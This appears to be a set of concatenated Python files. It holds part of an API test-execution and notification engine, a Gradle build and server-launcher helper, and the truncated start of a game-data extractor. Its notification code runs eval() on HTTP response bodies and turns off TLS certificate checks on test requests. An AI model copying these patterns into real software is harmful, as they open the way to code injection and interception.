# 处理 cookies for 用例组执行
test_case['cookies'] = []
for key, value in session.cookies.items():
cookie_dic = dict()
cookie_dic['name'] = key
cookie_dic['value'] = value
test_case['cookies'].append(cookie_dic)
returned_data['testCaseDetail']['cookies'] = test_case['cookies']
# 获取debug时保存的临时 cookies for 调试用例
if is_debug and not test_case.get('isClearCookie'):
request_cookies = get_cookies_by_suite(test_case.get("testSuiteId"))
returned_data['testCaseDetail']['cookies'] = request_cookies
if request_cookies:
cookie_jar = RequestsCookieJar()
for cookie in request_cookies:
cookie_jar.set(cookie['name'], cookie['value'])
session.cookies.update(cookie_jar)
try:
if 'delaySeconds' in test_case and test_case['delaySeconds'] > 0:
time.sleep(test_case['delaySeconds'])
returned_data['testCaseDetail']['delaySeconds'] = test_case['delaySeconds']
else:
returned_data['testCaseDetail']['delaySeconds'] = 0
if 'parameterType' in test_case and test_case["parameterType"] == "form":
response = session.request(url=request_url, method=request_method, data=request_body,
headers=request_headers, verify=False)
else:
response = session.request(url=request_url, method=request_method, json=request_body,
headers=request_headers, verify=False)
returned_data['elapsedSeconds'] = round(response.elapsed.total_seconds(), 3)
if is_debug:
# 保存的临时 cookies for 调试用例
response_cookies = []
for key, value in session.cookies.items():
cookie_dic = dict()
cookie_dic['name'] = key
cookie_dic['value'] = value
response_cookies.append(cookie_dic)
if len(response_cookies) > 0:
save_cookies_for_suite(test_case.get("testSuiteId"), response_cookies)
except BaseException as e:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1), 'reason': '请求失败, 错误信息: <%s> ' % e})
return returned_data
response_status_code = response.status_code
returned_data["responseStatusCode"] = response_status_code
returned_data["responseData"] = response.text
# checkResponseCode 校验处理
if 'checkResponseCode' in test_case and test_case['checkResponseCode'] not in ["", None]:
check_response_code = test_case['checkResponseCode']
returned_data['checkResponseCode'] = check_response_code
# checkSpendSeconds 校验处理
if 'checkSpendSeconds' in test_case and test_case['checkSpendSeconds'] > 0:
check_spend_seconds = test_case['checkSpendSeconds']
returned_data['checkSpendSeconds'] = check_spend_seconds
try:
response_json = json.loads(response.text) if isinstance(response.text,
str) and response.text.strip() else {}
except BaseException as e:
# 如果出现异常,表名接口返回格式不是json
if set_global_vars and isinstance(set_global_vars, list):
for set_global_var in set_global_vars:
if isinstance(set_global_var, dict) and isinstance(set_global_var.get('name'),
str) and set_global_var.get('name'):
name = set_global_var.get('name')
query = set_global_var.get('query')
if query and isinstance(query, list):
query = common.replace_global_var_for_list(init_var_list=query,
global_var_dic=self.global_vars)
value = common.dict_get(response.text, query)
self.global_vars[name] = str(value) if value else value
if is_debug:
new_temp_suite_params[name] = str(value) if value else value
# 保存临时suite 变量
if is_debug and new_temp_suite_params:
temp_suite_params.update(new_temp_suite_params)
save_temp_params_for_suite(test_case.get("testSuiteId"), temp_suite_params)
if check_response_code and not str(response_status_code) == str(check_response_code):
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '响应状态码错误, 期待值: <%s>, 实际值: <%s>。\t' % (check_response_code, response_status_code)})
return returned_data
if check_spend_seconds and check_spend_seconds < returned_data['elapsedSeconds']:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '请求超时, 期待耗时: %s s, 实际耗时: %s s。\t' % (
check_spend_seconds, returned_data['elapsedSeconds'])})
return returned_data
# check response number
need_check_res_num = isinstance(test_case.get('checkResponseNumber'), list) and len(
list(filter(lambda x: str(x.get('expressions').get('expectResult')).strip() == '',
test_case.get('checkResponseNumber')))) < 1
returned_data['status'] = 'failed' if need_check_res_num else 'ok'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '接口返回格式不是json,无法进行数值校验, 错误信息: %s, 接口返回为: %s ' % (e, response.text)}) \
if returned_data.get('status') and returned_data.get('status') == 'failed' else None
# checkResponseBody 校验处理
if 'checkResponseBody' in test_case and test_case['checkResponseBody'] not in [[], {}, "", None]:
if not isinstance(test_case['checkResponseBody'], list):
raise TypeError('checkResponseBody must be list!')
need_check_response_body = False
for index, check_item in enumerate(test_case['checkResponseBody']):
if not isinstance(check_item, dict) or 'regex' not in check_item or 'query' not in check_item or \
not isinstance(check_item['regex'], str) or not isinstance(check_item['query'], list):
raise TypeError('checkResponseBody is not valid!')
# 对校验结果进行全局替换
if len(check_item['regex']) > 0:
need_check_response_body = True
test_case['checkResponseBody'][index]['regex'] = common.replace_global_var_for_str(
init_var_str=check_item['regex'], global_var_dic=self.global_vars) if check_item.get(
'regex') and isinstance(check_item.get('regex'), str) else '' # 警告!python判断空字符串为False
if check_item.get('query') and isinstance(check_item.get('query'), list):
test_case['checkResponseBody'][index]['query'] = common.replace_global_var_for_list(
init_var_list=check_item['query'], global_var_dic=self.global_vars)
if need_check_response_body:
check_response_body = test_case['checkResponseBody']
returned_data['checkResponseBody'] = check_response_body
if check_response_body:
for check_item in check_response_body:
regex = check_item['regex']
query = check_item['query']
real_value = common.dict_get(response.text, query)
if real_value is None:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '未找到匹配的正则校验的值(查询语句为: %s), 服务器响应为: %s' % (query, response.text)})
return returned_data
result = re.search(regex, str(real_value)) # python 将regex字符串取了r''(原生字符串)
if not result:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '判断响应值错误(查询语句为: %s),响应值应满足正则: <%s>, 实际值: <%s> (%s)。(正则匹配时会将数据转化成string)\t'
% (query, regex, real_value, type(real_value))})
if returned_data['status'] == 'ok':
returned_data["testConclusion"].append({'resultType': test_conclusion.get(0), 'reason': '测试通过'})
return returned_data
if set_global_vars and isinstance(set_global_vars, list):
for set_global_var in set_global_vars:
if isinstance(set_global_var, dict) and isinstance(set_global_var.get('name'),
str) and set_global_var.get('name'):
name = set_global_var.get('name')
query = set_global_var.get('query')
value = common.dict_get(response_json, query)
self.global_vars[name] = str(value) if value else value
if is_debug:
new_temp_suite_params[name] = str(value) if value else value
# 保存临时suite 变量
if is_debug and new_temp_suite_params:
temp_suite_params.update(new_temp_suite_params)
save_temp_params_for_suite(test_case.get("testSuiteId"), temp_suite_params)
# checkResponseBody 校验处理
if 'checkResponseBody' in test_case and test_case['checkResponseBody'] not in [[], {}, "", None]:
if not isinstance(test_case['checkResponseBody'], list):
raise TypeError('checkResponseBody must be list!')
need_check_response_body = False
for index, check_item in enumerate(test_case['checkResponseBody']):
if not isinstance(check_item, dict) or 'regex' not in check_item or 'query' not in check_item or \
not isinstance(check_item['regex'], str) or not isinstance(check_item['query'], list):
raise TypeError('checkResponseBody is not valid!')
# 对校验结果进行全局替换
if len(check_item['regex']) > 0:
need_check_response_body = True
test_case['checkResponseBody'][index]['regex'] = common.replace_global_var_for_str(
init_var_str=check_item['regex'], global_var_dic=self.global_vars) if check_item.get(
'regex') and isinstance(check_item.get('regex'), str) else '' # 警告!python判断空字符串为False
if check_item.get('query') and isinstance(check_item.get('query'), list):
test_case['checkResponseBody'][index]['query'] = common.replace_global_var_for_list(
init_var_list=check_item['query'], global_var_dic=self.global_vars)
if need_check_response_body:
check_response_body = test_case['checkResponseBody']
returned_data['checkResponseBody'] = check_response_body
# checkResponseNumber 校验处理
if 'checkResponseNumber' in test_case and not test_case['checkResponseNumber'] in [[], {}, "", None]:
if not isinstance(test_case['checkResponseNumber'], list):
raise TypeError('checkResponseNumber must be list!')
for index, check_item in enumerate(test_case['checkResponseNumber']):
if not isinstance(check_item, dict) or 'expressions' not in check_item or not isinstance(
check_item['expressions'], dict):
raise TypeError('checkResponseNumber is not valid!')
test_case['checkResponseNumber'][index]['expressions']['firstArg'] = common.replace_global_var_for_str(
init_var_str=check_item['expressions']['firstArg'],
global_var_dic=self.global_vars) if check_item['expressions'].get('firstArg') and isinstance(
check_item['expressions'].get('firstArg'), str) else ''
test_case['checkResponseNumber'][index]['expressions']['secondArg'] = common.replace_global_var_for_str(
init_var_str=check_item['expressions']['secondArg'],
global_var_dic=self.global_vars) if check_item['expressions'].get('secondArg') and isinstance(
check_item['expressions'].get('secondArg'), str) else ''
test_case['checkResponseNumber'][index]['expressions'][
'expectResult'] = common.replace_global_var_for_str(
init_var_str=check_item['expressions']['expectResult'],
global_var_dic=self.global_vars) if check_item['expressions'].get('expectResult') and isinstance(
check_item['expressions'].get('expectResult'), str) else ''
check_response_number = test_case['checkResponseNumber']
returned_data['checkResponseNumber'] = []
if check_response_code and not str(response_status_code) == str(check_response_code):
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '响应状态码错误, 期待值: <%s>, 实际值: <%s>。\t' % (check_response_code, response_status_code)})
if check_spend_seconds and check_spend_seconds < returned_data['elapsedSeconds']:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '请求超时, 期待耗时: %s s, 实际耗时: %s s。\t' % (
check_spend_seconds, returned_data['elapsedSeconds'])})
return returned_data
if check_response_body:
try:
for check_item in check_response_body:
regex = check_item['regex']
if regex.strip() == '':
continue
query = check_item['query']
real_value = common.dict_get(response_json, query)
if real_value is None:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '未找到正则校验的Json值(查询语句为: %s), 服务器响应为: %s' % (query, response_json)})
return returned_data
result = re.search(regex, str(real_value)) # python 将regex字符串取了r''(原生字符串)
if not result:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '判断响应值错误(查询语句为: %s),响应值应满足正则: <%s>, 实际值: <%s> (%s)。(正则匹配时会将数据转化成string)\t'
% (query, regex, real_value, type(real_value))})
except BaseException as e:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append({'resultType': test_conclusion.get(1),
'reason': '判断响应值时报错, 错误信息: <%s>。\t' % e})
if check_response_number:
try:
for check_item in check_response_number:
expressions = check_item['expressions']
if '' in expressions.values() or None in expressions.values():
continue
expressions_str, result = common.get_numbers_compared_result(expressions)
returned_data['checkResponseNumber'].append({'expression': expressions_str})
if not result:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append(
{'resultType': test_conclusion.get(1),
'reason': '判断数值错误(判断表达式为: %s)。\t' % expressions_str})
except BaseException as e:
returned_data["status"] = 'failed'
returned_data["testConclusion"].append({'resultType': test_conclusion.get(1),
'reason': '判断数值时报错, 错误信息: <%s>。\t ' % e})
if not returned_data["testConclusion"]:
returned_data["status"] = 'ok'
returned_data["testConclusion"].append({'resultType': test_conclusion.get(0),
'reason': '测试通过'})
return returned_data
def execute_manual_test_by_case(self, test_case_list):
test_results = []
for test_case in test_case_list:
test_start_time = time.time()
test_start_datetime = datetime.utcnow()
test_result = self.execute_single_case_test(test_case, is_debug=True)
test_end_time = time.time()
test_result["testStartTime"] = test_start_datetime
test_result["spendTimeInSec"] = round(test_end_time - test_start_time, 3)
test_results.append(test_result)
return test_results
def execute_single_suite_test(self, report_id, test_suite_id, include_forbidden=False):
testing_case_list = get_case_list_by_suite(test_suite_id, include_forbidden=include_forbidden)
test_suite_result = {
'_id': ObjectId(test_suite_id),
'suiteName': get_suite_name(test_suite_id),
'testStartTime': datetime.utcnow(),
'totalCount': len(testing_case_list)
}
pass_count = 0
fail_count = 0
error_count = 0
suite_start_time = time.time()
for test_case in testing_case_list:
test_start_datetime = datetime.utcnow()
test_start_time = time.time()
test_result = self.execute_single_case_test(test_case)
test_end_time = time.time()
test_result["name"] = test_case['name']
test_result["testStartTime"] = test_start_datetime
test_result["spendTimeInSec"] = round(test_end_time - test_start_time, 3)
save_report_detail(report_id, test_suite_id, test_case['_id'], test_result)
result_type = test_result['testConclusion'][0]['resultType']
if result_type == test_conclusion.get(0):
pass_count += 1
elif result_type == test_conclusion.get(1):
fail_count += 1
elif result_type == test_conclusion.get(2):
error_count += 1
suite_end_time = time.time()
test_suite_result['spendTimeInSec'] = round(suite_end_time - suite_start_time, 3)
test_suite_result['passCount'] = pass_count
test_suite_result['failCount'] = fail_count
test_suite_result['errorCount'] = error_count
return test_suite_result
# 异步执行,便于调试时及时反馈
@async_test
def execute_test_by_suite_async(report_id, test_report, test_env_id, test_suite_id_list, protocol, domain,
global_env_vars):
test_report['testStartTime'] = datetime.utcnow()
report_total_count = 0
report_pass_count = 0
report_fail_count = 0
report_error_count = 0
report_start_time = time.time()
test_report['testSuites'] = {}
for test_suite_id in test_suite_id_list:
execute_engine = ExecutionEngine(test_env_id=test_env_id, protocol=protocol, domain=domain,
global_env_vars=global_env_vars)
test_suite_result = execute_engine.execute_single_suite_test(report_id, test_suite_id)
test_report['testSuites'][test_suite_id] = test_suite_result
report_total_count += test_suite_result['totalCount']
report_pass_count += test_suite_result['passCount']
report_fail_count += test_suite_result['failCount']
report_error_count += test_suite_result['errorCount']
test_report['totalCount'] = report_total_count
test_report['passCount'] = report_pass_count
test_report['failCount'] = report_fail_count
test_report['errorCount'] = report_error_count
report_end_time = time.time()
test_report['spendTimeInSec'] = round(report_end_time - report_start_time, 3)
test_report['createAt'] = datetime.utcnow()
save_report(test_report)
# 定时任务, 需同步执行
def execute_test_by_suite(report_id, test_report, test_env_id, test_suite_id_list, protocol, domain, global_env_vars):
test_report['testStartTime'] = datetime.utcnow()
report_total_count = 0
report_pass_count = 0
report_fail_count = 0
report_error_count = 0
report_start_time = time.time()
test_report['testSuites'] = {}
for test_suite_id in test_suite_id_list:
execute_engine = ExecutionEngine(test_env_id=test_env_id, protocol=protocol, domain=domain,
global_env_vars=global_env_vars)
test_suite_result = execute_engine.execute_single_suite_test(report_id, test_suite_id)
test_report['testSuites'][test_suite_id] = test_suite_result
report_total_count += test_suite_result['totalCount']
report_pass_count += test_suite_result['passCount']
report_fail_count += test_suite_result['failCount']
report_error_count += test_suite_result['errorCount']
test_report['totalCount'] = report_total_count
test_report['passCount'] = report_pass_count
test_report['failCount'] = report_fail_count
test_report['errorCount'] = report_error_count
report_end_time = time.time()
test_report['spendTimeInSec'] = round(report_end_time - report_start_time, 3)
test_report['createAt'] = datetime.utcnow()
return test_report
@async_test
def execute_plan_async(plan_id, plan_report_id, test_plan_report, test_env_id, env_name, protocol, domain,
execution_mode="planManual"):
# validate plan id
res_plan = common.format_response_in_dic(Plan.find_one({'_id': ObjectId(plan_id)}))
execution_range = list(map(get_project_execution_range, res_plan.get("executionRange")))
is_parallel = res_plan.get('isParallel')
plan_name = res_plan.get('name')
always_send_mail = res_plan.get('alwaysSendMail')
alarm_mail_group_list = res_plan.get('alarmMailGroupList')
enable_wxwork_notify = res_plan.get('enableWXWorkNotify')
wxwork_api_key = res_plan.get('WXWorkAPIKey')
mentioned_mobile_list = res_plan.get('WXWorkMentionMobileList')
always_wxwork_notify = res_plan.get('alwaysWXWorkNotify')
enable_ding_talk_notify = res_plan.get('enableDingTalkNotify')
ding_talk_access_token = res_plan.get('DingTalkAccessToken')
ding_talk_at_mobiles = res_plan.get('DingTalkAtMobiles')
ding_talk_secret = res_plan.get('DingTalkSecret')
always_ding_talk_notify = res_plan.get('alwaysDingTalkNotify')
# test plan report
test_plan_report['testStartTime'] = datetime.utcnow()
plan_total_count = 0
plan_pass_count = 0
plan_fail_count = 0
plan_error_count = 0
plan_start_time = time.time()
try:
if is_parallel:
counts = []
pool = Pool(processes=len(execution_range))
for item in execution_range:
count_dict = pool.apply_async(execute_single_project,
(item, plan_report_id, test_env_id, env_name, protocol, domain,
execution_mode))
counts.append(count_dict)
pool.close()
pool.join()
for count in counts:
plan_total_count += int(count.get().get("total_count"))
plan_pass_count += int(count.get().get("pass_count"))
plan_fail_count += int(count.get().get("fail_count"))
plan_error_count += int(count.get().get("error_count"))
else:
for item in execution_range:
count_dict = execute_single_project(item, plan_report_id, test_env_id, env_name, protocol, domain,
execution_mode)
plan_total_count += count_dict.get("total_count")
plan_pass_count += count_dict.get("pass_count")
plan_fail_count += count_dict.get("fail_count")
plan_error_count += count_dict.get("error_count")
test_plan_report['totalCount'] = plan_total_count
test_plan_report['passCount'] = plan_pass_count
test_plan_report['failCount'] = plan_fail_count
test_plan_report['errorCount'] = plan_error_count
plan_end_time = time.time()
test_plan_report['spendTimeInSec'] = round(plan_end_time - plan_start_time, 3)
test_plan_report['createAt'] = datetime.utcnow()
save_plan_report(test_plan_report)
if test_plan_report['totalCount'] > 0:
notify_total_count = test_plan_report['totalCount']
notify_pass_count = test_plan_report['passCount']
notify_pass_rate = '{:.2%}'.format(notify_pass_count / notify_total_count)
# 发送 邮件通知
alarm_mail_list = []
if alarm_mail_group_list:
if isinstance(alarm_mail_group_list, list) and len(alarm_mail_group_list) > 0:
alarm_mail_list = get_mails_by_group(alarm_mail_group_list)
else:
raise TypeError('alarm_mail_group_list must be list')
is_send_mail = ((always_send_mail and isinstance(alarm_mail_list, list) and len(alarm_mail_list) > 0)
or (test_plan_report['totalCount'] > test_plan_report['passCount']
and isinstance(alarm_mail_list, list) and len(alarm_mail_list) > 0))
if is_send_mail:
subject = 'Leo API Auto Test Notify'
content_plan_result = "<font color='green'>PASS</font>"
if test_plan_report['totalCount'] > test_plan_report['passCount']:
content_plan_result = "<font color='red'>FAIL</font>"
content = "<h2>Dears:</h2>" \
"<div style='font-size:20px'> API Test Plan executed successfully!<br/>" \
" Plan Name: <b>{}</b><br/>" \
" Environment: <b>{}</b><br/>" \
" Status: <b>{}</b><br/>" \
" TotalAPICount: <b>{}</b><br/>" \
" PassAPICount: <b>{}</b><br/>" \
" PassRate: <b>{}</b><br/>" \
" <a href=\"http://{}:{}/plan/{}/reportDetail/{}\">Please login platform " \
"for details!</a><br/>" \
" Report ID: {}<br/>" \
" Generated At: {} CST</div>" \
.format(plan_name, env_name, content_plan_result, notify_total_count, notify_pass_count,
notify_pass_rate, host_ip, host_port, plan_id, plan_report_id, plan_report_id,
test_plan_report['createAt'].replace(tzinfo=pytz.utc).astimezone(
pytz.timezone('Asia/Shanghai')).strftime('%Y-%m-%d %H:%M:%S'))
mail_result = send_cron_email(alarm_mail_list, subject, content)
if mail_result.get('status') == 'failed':
with app.app_context():
current_app.logger.error('邮件发送异常: {}'.format(mail_result.get('data')))
raise BaseException('邮件发送异常: {}'.format(mail_result.get('data')))
# 发送企业微信通知
if enable_wxwork_notify:
if always_wxwork_notify or test_plan_report['totalCount'] > test_plan_report['passCount']:
notify_title = 'Leo API Auto Test Notify'
content_plan_result = "<font color='green'>PASS</font>"
if test_plan_report['totalCount'] > test_plan_report['passCount']:
content_plan_result = "<font color='red'>FAIL</font>"
content_text = '''请注意'''
content_markdown = '''{}
> Dears:
API Test Plan executed successfully!
Plan Name: **{}**
Environment: **{}**
Status: **{}**
TotalAPICount: **{}**
PassAPICount: **{}**
PassRate: **{}**
[Please login platform for details!](http://{}:{}/plan/{}/reportDetail/{})
Report ID: {}
Generated At: {} CST
'''.format(notify_title, plan_name, env_name, content_plan_result, notify_total_count,
notify_pass_count,
notify_pass_rate,
host_ip, host_port, plan_id, plan_report_id, plan_report_id,
test_plan_report['createAt'].replace(tzinfo=pytz.utc).astimezone(
pytz.timezone('Asia/Shanghai')).strftime('%Y-%m-%d %H:%M:%S'))
if mentioned_mobile_list and len(mentioned_mobile_list) > 0:
notify_res_text = send_notify.send_wxwork_notify_text(content_text, mentioned_mobile_list,
wxwork_api_key)
if notify_res_text.status_code != 200 or eval(
str(notify_res_text.content, encoding="utf-8")).get('errcode') != 0:
with app.app_context():
current_app.logger.error('企业微信通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res_text.status_code, notify_res_text.content))
raise BaseException('企业微信通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res_text.status_code, notify_res_text.content))
notify_res_markdown = send_notify.send_wxwork_notify_markdown(content_markdown, wxwork_api_key)
if notify_res_markdown.status_code != 200 or eval(
str(notify_res_markdown.content, encoding="utf-8")).get('errcode') != 0:
with app.app_context():
current_app.logger.error('企业微信通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res_markdown.status_code, notify_res_markdown.content))
raise BaseException('企业微信通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res_markdown.status_code, notify_res_markdown.content))
# 发送钉钉通知
if enable_ding_talk_notify:
if always_ding_talk_notify or test_plan_report['totalCount'] > test_plan_report['passCount']:
notify_title = 'LEO API Auto Test Notify'
content_plan_result = "<font color='#00FF00'>PASS</font>"
if test_plan_report['totalCount'] > test_plan_report['passCount']:
content_plan_result = "<font color='#FF0000'>FAIL</font>"
content = "# {}\n" \
"API Test Plan executed successfully!\n\n" \
" Plan Name: **{}** \n\n" \
" Environment: **{}** \n\n" \
" Status: **{}** \n\n" \
" TotalAPICount: **{}** \n\n" \
" PassAPICount: **{}** \n\n" \
" PassRate: **{}** \n\n" \
" [Please login platform for details!](http://{}:{}/plan/{}/reportDetail/{})\n\n" \
" Report ID: **{}** \n\n" \
" Generated At: **{}** CST\n\n".format(notify_title, plan_name, env_name,
content_plan_result, notify_total_count,
notify_pass_count,
notify_pass_rate,
host_ip, host_port, plan_id, plan_report_id,
plan_report_id,
test_plan_report['createAt'].replace(
tzinfo=pytz.utc).astimezone(
pytz.timezone('Asia/Shanghai')).strftime(
'%Y-%m-%d %H:%M:%S'))
notify_res = send_notify.send_ding_talk_notify_markdown(notify_title, content,
ding_talk_access_token,
at_mobiles=ding_talk_at_mobiles,
secret=ding_talk_secret)
if notify_res.status_code != 200 or eval(str(notify_res.content, encoding="utf-8")).get(
'errcode') != 0:
with app.app_context():
current_app.logger.error('钉钉通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res.status_code, notify_res.content))
raise BaseException('钉钉通知发送异常: ResponseCode:{}, ResponseBody:{}'.format(
notify_res.status_code, notify_res.content))
else:
raise TypeError('无任何测试结果!')
except BaseException as e:
with app.app_context():
current_app.logger.error("execute_plan_async exception - %s." % str(e))
return False, "出错了 - %s" % e
def execute_single_project(item, plan_report_id, test_env_id, env_name, protocol, domain, execution_mode):
# 根据时间生成一个ObjectId作为reportId
project_report_id = str(ObjectId())
project_start_datetime = datetime.utcnow()
project_test_report = {
'_id': ObjectId(project_report_id),
'testEnvId': ObjectId(test_env_id),
'testEnvName': env_name,
'testStartTime': project_start_datetime,
'executionMode': execution_mode,
'projectId': ObjectId(item.get('projectId')),
'planReportId': ObjectId(plan_report_id),
'testSuites': {}
}
project_report_total_count = 0
project_report_pass_count = 0
project_report_fail_count = 0
project_report_error_count = 0
project_start_time = time.time()
for test_suite_id in item.get("testSuiteIdList"):
global_env_vars = get_global_env_vars(test_env_id)
execute_engine = ExecutionEngine(test_env_id=test_env_id, protocol=protocol, domain=domain,
global_env_vars=global_env_vars)
test_suite_result = execute_engine.execute_single_suite_test(project_report_id, test_suite_id)
project_test_report['testSuites'][test_suite_id] = test_suite_result
project_report_total_count += test_suite_result['totalCount']
project_report_pass_count += test_suite_result['passCount']
project_report_fail_count += test_suite_result['failCount']
project_report_error_count += test_suite_result['errorCount']
project_test_report['totalCount'] = project_report_total_count
project_test_report['passCount'] = project_report_pass_count
project_test_report['failCount'] = project_report_fail_count
project_test_report['errorCount'] = project_report_error_count
project_end_time = time.time()
project_test_report['spendTimeInSec'] = round(project_end_time - project_start_time, 3)
project_test_report['createAt'] = datetime.utcnow()
save_report(project_test_report)
return {
'total_count': project_report_total_count,
'pass_count': project_report_pass_count,
'fail_count': project_report_fail_count,
'error_count': project_report_error_count
}
def get_project_execution_range(range):
# get execution range by priority for project
if range.get("projectId") is None or range.get("priority") is None:
with app.app_context():
current_app.logger.error("ProjectId and Priority should not be empty.")
if range.get("priority") == "P1" or range.get("priority") == "P2":
query_dict = {'projectId': ObjectId(range.get("projectId")),
'priority': range.get("priority"),
'isDeleted': {"$ne": True},
'status': True}
else:
query_dict = {'projectId': ObjectId(range.get("projectId")), 'isDeleted': {"$ne": True}, 'status': True}
res = TestSuite.find(query_dict)
test_suite_id_list = list(map(lambda e: str(e.get('_id')), res))
return {"projectId": range.get("projectId"), "testSuiteIdList": test_suite_id_list}
if __name__ == '__main__':
pass
|
server_controller.py
|
import subprocess
import sys
import functools
import os
import os.path as path
from threading import Thread
from queue import Queue, Empty
module_dir = path.abspath(path.join(path.dirname(__file__)))
_root_dir = path.abspath(path.join(module_dir, '..'))
class StdOutReader:
def __init__(self, stream, verbose=False):
self._stream = stream
self._queue = Queue()
self._read = True
def _reader(s, queue, verbose):
while self._read:
line = s.readline()
s.flush()
if line:
if verbose:
print(line)
queue.put(line)
self._thread = Thread(target=_reader, args=(self._stream, self._queue, verbose))
self._thread.daemon = True
self._thread.start()
def readline(self):
try:
return str(self._queue.get(block=False, timeout=0.1))
except Empty:
return ''
def stop(self):
self._read = False
self._thread.join()
class Initializer:
def __init__(self, project):
cmd = self._cmd_for_task(project, 'assembleDist', 'installDist')
print("gradle cmd: {}".format(cmd))
project_module_dir = path.abspath(path.join(_root_dir, project))
self._init_script = path.join(project_module_dir,
'build/install/{}/bin/{}'.format(project, project))
if subprocess.call(cmd, shell=True) == 0 and path.exists(self._init_script):
print('assembleDist installDist success')
else:
print('assembleDist installDist failed')
sys.exit(1)
def _cmd_for_task(self, project, *tasks):
template = ':{}:{}'
t = functools.reduce(lambda a, b: ("", template.format(project, a) + " " + template.format(project, b)), tasks)[1]
return "{}/gradlew -p {} {}".format(_root_dir, _root_dir, t)
@property
def init_script(self):
return self._init_script
class Server:
def __init__(self, script, ready_str, *args, **kwargs):
self._port = kwargs.get('port', '')
self._name = kwargs.get('name', 'unnamed')
self._verbose = kwargs.get('verbose', False)
if len(args) > 1:
argv = ' '
for each in [str(i).strip() for i in args if len(str(i)) > 0]:
argv += ' ' + each
elif len(args) is 1:
argv = str(args[0]).strip()
else:
argv = ''
self.cmd = ' '.join("{} {} {} {}".format(script, self.port, self.name, argv).split())
self.process = None
self.ready_str = ready_str
@property
def port(self):
return str(self._port)
@property
def name(self):
return str(self._name)
def run(self):
if self.process is None:
print("server {} run cmd: {}".format(self.name, self.cmd))
env = {**os.environ, 'JAVA_OPTS': '-DDEBUG=1'}
self.process = subprocess.Popen("exec " + self.cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, env=env)
self.nb_err = StdOutReader(self.process.stderr, verbose=self._verbose)
self.nb_out = StdOutReader(self.process.stdout, verbose=self._verbose)
while True:
if self.ready_str in self.nb_err.readline() or self.ready_str in self.nb_out.readline():
break
return self
def kill(self):
if self.process is not None:
print("killing: {} : {}".format(self.name, self.process.pid))
self.process.kill()
self.nb_err.stop()
self.nb_out.stop()
outs, errs = self.process.communicate()
if outs or errs:
print("kill outs:{}".format(outs))
print("kill errs:{}".format(errs))
|
DataExtractor.py
|
# Extract the useful data from game files (json)
# Append the useful data to a csv file
import pickle
import os
import queue
import sys
from collections import OrderedDict
import multiprocessing
from multiprocessing.managers import BaseManager, NamespaceProxy
import time
import Modes
import pandas as pd
from collections import Counter
CHUNK_SIZE = 100
def extracted_writer(extracted_file, q, stop):
with open(extracted_file, 'a+') as f:
while not stop.is_set():
try:
game_path = q.get(timeout=1)
except queue.Empty:
continue
f.write(game_path)
f.write('\n')
print('Closing writer', file=sys.stderr)
class Extractor:
def __init__(self, mode, extracted_files, current_index, rot_length, writing_q):
self.mode = mode
self.rot_length = rot_length
self.writing_q = writing_q
self.current_index = current_index
if len(extracted_files) >= self.current_index > 0: # the file already exist
self.csv_file = os.path.join(mode.EXTRACTED_DIR, extracted_files[self.current_index - 1])
self.csv_index = len(pd.read_csv(self.csv_file, skiprows=1))
print(self.csv_file, 'lines', self.csv_index, file=sys.stderr)
else:
self.csv_file = None
self.csv_index = mode.DATA_LINES
class ExManager(BaseManager):
pass
class ExProxy(NamespaceProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__', 'b')
ExManager.register('Extractor', Extractor, ExProxy)
def run(mode, cpu):
extracted_file = mode.EXTRACTED_FILE
if os.path.isfile(extracted_file):
with open(extracted_file, 'r') as f:
extracted_list = [x.strip() for x in f.readlines()]
else:
extracted_list = []
gamePaths = []
for patch in mode.learning_patches:
for region in mode.REGIONS:
if os.path.isdir(os.path.join(mode.DATABASE, 'patches', patch, region)):
gamePaths.extend(
[os.path.join(mode.DATABASE, 'patches', patch, region, f) for f in
os.listdir(os.path.join(mode.DATABASE, 'patches', patch, region))])
print('%d game files found' % len(gamePaths), file=sys.stderr)
gamePaths = list(set(gamePaths) - set(extracted_list))
print('%d new games to extract' % len(gamePaths), file=sys.stderr)
if not os.path.isdir(mode.EXTRACTED_DIR):
os.makedirs(mode.EXTRACTED_DIR)
extracted_files = [f for f in os.listdir(mode.EXTRACTED_DIR)]
l = list(map(lambda x: int(x.replace('data_', '').replace('.csv', '')), extracted_files))
l = sorted(range(len(l)), key=lambda k: l[k])
extracted_files = [extracted_files[k] for k in l]
# multiprocessing
manager = multiprocessing.Manager()
writing_q = manager.Queue()
stop = manager.Event()
writer = multiprocessing.Process(target=extracted_writer, args=(extracted_file, writing_q, stop))
writer.start()
ex_manager = ExManager()
ex_manager.start()
available_extractors = []
running_extractors = []
for i in range(cpu):
current_index = len(extracted_files) - i
# noinspection PyUnresolvedReferences
available_extractors.append(ex_manager.Extractor(mode, extracted_files, current_index, cpu, writing_q))
while gamePaths:
# we work with chunks in order to save time (no need to hand over the extractor for every single game
chunk = gamePaths[:CHUNK_SIZE]
gamePaths = gamePaths[CHUNK_SIZE:]
print(len(gamePaths), 'left', file=sys.stderr)
while not available_extractors: # wait until an extractor is available
for p, ex in running_extractors:
if p.is_alive():
continue
available_extractors.append(ex)
running_extractors.remove((p, ex))
if not available_extractors: # wait a bit
time.sleep(0.001)
# start a new job
